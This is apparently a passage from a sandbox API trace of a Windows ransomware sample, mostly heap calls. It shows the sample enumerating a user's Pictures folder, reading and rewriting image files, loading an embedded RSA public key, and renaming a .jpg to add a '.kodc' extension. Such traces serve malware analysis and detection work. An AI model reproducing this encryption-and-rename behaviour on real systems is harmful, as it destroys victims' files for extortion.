RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aef8 | out: hHeap=0x630000) returned 1 [0099.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aee0 | out: hHeap=0x630000) returned 1 [0099.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.442] GetCurrentThreadId () returned 0x42c [0099.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5468 [0099.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.443] GetCurrentThreadId () returned 0x42c [0099.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.443] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.444] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aee0 [0099.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aef8 [0099.445] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.445] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aec8 [0099.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331af10 [0099.446] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.446] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0099.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aee0 | out: hHeap=0x630000) returned 1 [0099.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aee0 [0099.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.447] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.447] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0099.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aee0 | out: hHeap=0x630000) returned 1 [0099.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.448] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.448] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aef8 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aec8 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aeb0 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9bad0 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.449] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.450] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0xe719, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xe719, lpOverlapped=0x0) returned 1 [0099.450] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.450] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe71e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.463] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.466] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.466] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.466] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.467] CloseHandle (hObject=0x5cc) returned 1 [0099.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.470] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cIdoFCqOwklL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cidofcqowkll.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cIdoFCqOwklL.jpg.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cidofcqowkll.jpg.kodc")) returned 1 [0099.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.473] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.475] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0099.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.475] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned=".ini" [0099.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.476] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x408ae940, ftCreationTime.dwHighDateTime=0x1d5b952, ftLastAccessTime.dwLowDateTime=0xc428d4f0, ftLastAccessTime.dwHighDateTime=0x1d5bec6, ftLastWriteTime.dwLowDateTime=0xc428d4f0, ftLastWriteTime.dwHighDateTime=0x1d5bec6, nFileSizeHigh=0x0, nFileSizeLow=0x6798, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EMAWy8841S2yxXM_lme.bmp", cAlternateFileName="EMAWY8~1.BMP")) returned 1 [0099.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.476] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EMAWy8841S2yxXM_lme.bmp") returned=".bmp" [0099.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EMAWy8841S2yxXM_lme.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\emawy8841s2yxxm_lme.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.476] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=26520) returned 1 [0099.476] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.479] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6772, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.480] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.480] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.481] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.481] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.481] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x6798, lpOverlapped=0x0) returned 1 [0099.481] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.481] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.481] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.481] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.481] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.483] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.483] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.483] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.483] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.483] GetLastError () returned 0x0 [0099.483] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.483] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.483] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.483] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.483] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x67a0) returned 0x9ba6d90 [0099.483] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bad0 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aeb0 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bb18 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 